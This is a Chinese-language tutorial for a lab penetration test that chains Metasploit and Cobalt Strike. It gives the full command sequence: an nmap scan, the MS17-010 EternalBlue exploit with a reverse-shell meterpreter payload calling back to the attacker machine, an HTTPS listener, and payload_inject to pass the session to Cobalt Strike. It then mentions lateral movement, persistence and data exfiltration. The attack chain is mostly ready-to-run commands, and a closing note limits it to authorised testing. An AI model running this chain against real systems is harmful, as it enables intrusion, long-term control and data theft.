MSF和CobaltStrike联动
字数 1229 2025-08-15 21:32:08
MSF与CobaltStrike联动渗透测试指南
0x00 环境准备
测试环境配置
- 攻击机: Kali Linux (192.168.60.129)
- 受害机: Windows系统 (192.168.60.131)
- 网关: 192.168.60.2
所需工具
- Nmap - 网络扫描和信息收集
- Metasploit Framework (MSF) - 漏洞利用框架
- CobaltStrike - 高级威胁模拟平台
0x01 信息收集阶段
使用Nmap进行扫描
nmap -A 192.168.60.131
扫描结果分析:
- 开放端口: 445(SMB)、3389(RDP)
- 操作系统版本信息
漏洞检测
发现目标存在MS17-010(EternalBlue)漏洞
0x02 Metasploit漏洞利用
启动MSF控制台
msfconsole
搜索并选择漏洞模块
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
配置攻击参数
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.60.131
set LHOST 192.168.60.129
执行攻击
exploit
成功获取meterpreter会话(session id为1)
0x03 CobaltStrike联动配置
启动CobaltStrike
- 启动CobaltStrike团队服务器
- 连接客户端
创建监听器
- 在CobaltStrike中新建监听器
- 配置参数:
- 监听器类型: HTTPS
- 主机: 192.168.60.129
- 端口: 12388
0x04 会话派生(Spawning)
在MSF中配置会话派生
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_https
set DisablePayloadHandler true
set lhost 192.168.60.129
set lport 12388
set session 1
exploit
关键注意事项
- 只有Meterpreter类型的session才能派生给CobaltStrike
- DisablePayloadHandler设置为true以避免创建新的处理程序
0x05 CobaltStrike后续利用
成功派生会话后,可在CobaltStrike中:
- 使用内置的渗透测试模块
- 进行横向移动
- 权限维持
- 数据渗出等高级操作
0x06 技术要点总结
-
信息收集至关重要:
- 详细的信息收集决定渗透路线
- 信息关联使用能放大渗透成果
-
工具联动优势:
- 结合MSF的漏洞利用能力和CobaltStrike的后期渗透能力
- 实现从初始入侵到长期控制的完整链条
-
会话派生限制:
- 仅Meterpreter会话支持派生
- 需确保payload类型兼容
-
安全注意事项:
- 本技术仅用于合法授权测试
- 未经授权使用可能涉及法律风险
附录: 常用命令速查
| 工具 | 命令/操作 | 说明 |
|---|---|---|
| Nmap | nmap -A <target> |
全面扫描目标 |
| MSF | search <keyword> |
搜索模块 |
| MSF | use <module> |
选择模块 |
| MSF | set <option> <value> |
设置参数 |
| MSF | exploit |
执行攻击 |
| CobaltStrike | 创建HTTPS监听器 | 准备接收会话 |
| MSF | payload_inject |
派生会话到CS |